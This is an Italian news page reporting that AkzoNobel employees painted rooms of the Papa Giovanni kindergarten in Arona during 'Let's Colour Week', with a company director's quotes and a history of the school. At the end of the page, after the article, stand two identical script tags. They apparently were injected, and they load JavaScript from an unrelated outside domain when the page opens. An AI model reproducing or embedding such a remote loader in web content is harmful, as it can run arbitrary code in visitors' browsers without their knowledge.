1. Home
  2. Notizie e Mercato
  3. Let’s Colour Week, AkzoNobel colora la Scuola Materna Papa Giovanni di Arona

Let’s Colour Week, AkzoNobel colora la Scuola Materna Papa Giovanni di Arona

Lavori pubblici di
Let’s Colour Week, AkzoNobel colora la Scuola Materna Papa Giovanni di Arona
5/5
votato da 1 persone
I di


AkzoNobel, leader mondiale nel mercato dei prodotti vernicianti per l’edilizia e il restauro, è stata protagonista anche quest’anno di una importante iniziativa sul territorio nell’ambito della settimana del colore, la Let’s Colour Week, dal 8 al 12 ottobre. Dopo l’esperienza della scuola media Belfanti di Castelletto Ticino (NO) e della Comunità di Santa Lucia di Novara, i dipendenti dell’azienda si sono offerti di colorare alcune sale della Scuola Materna Papa Giovanni, più nota come Asilo 3 Ponti, che è stata recentemente ristrutturata e ampliata.

I lavori sono stati coordinati dall’equipe tecnica dei laboratori Sikkens della sede di Castelletto Ticino (NO), e vedono la partecipazioni di circa 35 dipendenti suddivisi in due gruppi di lavoro, per un intervento di tinteggiatura di una superficie di circa 450 mq. Presente anche il Vicesindaco di Arona, Claudio Peverelli che ha salutato la giornata insieme al nuovo Direttore Generale di AkzoNobel Deco Italia, dott. Michelangelo Pajno. Il progetto di ampliamento della scuola è stato curato dall’architetto Mario Ziggiotto.

“Questa nostra iniziativa rappresenta per tutta l’organizzazione un segnale importante della nostra presenza sul territorio e per la comunità di Arona” afferma Michelangelo Pajno Direttore Generale AkzoNobel Deco Italia. “dopo le entusiasmanti esperienza di Castelletto Ticino e della Comunità di Santa Lucia di Novara, non potevamo non partecipare ad una iniziativa locale ad Arona, città così prossima al nostro sito produttivo e dalla quale provengono molti dei nostri collaboratori. Il nostro è un impegno di carattere internazionale, che trova conferma attraverso una serie di campagne di responsabilità sociale che si ispirano al principio di “aggiungere colore nella vita delle persone”. La settimana del colore, (definita Let’s Colour Week) è l’espressione del nostro desiderio di essere protagonisti nell’avventura del colore per diffondere e rafforzare un messaggio di coesione sociale e partecipazione, e offrire un piccolo contributo per migliorare la vita delle persone attraverso l’uso del colore negli ambienti della vita quotidiana”.

Scuola Materna Papa Giovanni, Asilo 3 Ponti di Arona.
L’Asilo 3 Ponti è una vera istituzione per la città di Arona. Alcuni dei dipendenti di AkzoNobel sono stati alunni e ricordano ancora oggi con piacere i momenti trascorsi all’asilo. Fondata nel 1969 come “Scuola Materna Papa Giovanni” da una iniziativa del parroco della Parrocchia San Giorgio di Mercurago, con l’appoggio di molti cittadini aronesi e della Congregazione delle Suore di Nostra signora della Neve di Savona che si fece carico di seguire la parte didattica della scuola. Nel 2001 ottiene la parità scolastica. Il contesto sociale nel quale si sviluppò questa opera educativa era di tipo popolare, legato alla presenza dell’azienda Pirelli e di altre fabbriche che davano alle donne crescenti opportunità di trovare lavoro. A tale opportunità seguiva però la necessità delle madri-lavoratrici di trovare un luogo di cura per i propri figli e così, non senza difficoltà, nacque e crebbe la “Scuola materna Papa Giovanni”.
Ancora oggi la scuola è fondamentale per il territorio e la città di Arona, ed accoglie circa 90 bambini tra i 3 e i 6 anni. La sua proposta educativa è fondata sui valori cristiani, sull’accoglienza e sulla concreta compagnia ai genitori nel loro compito educativo.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>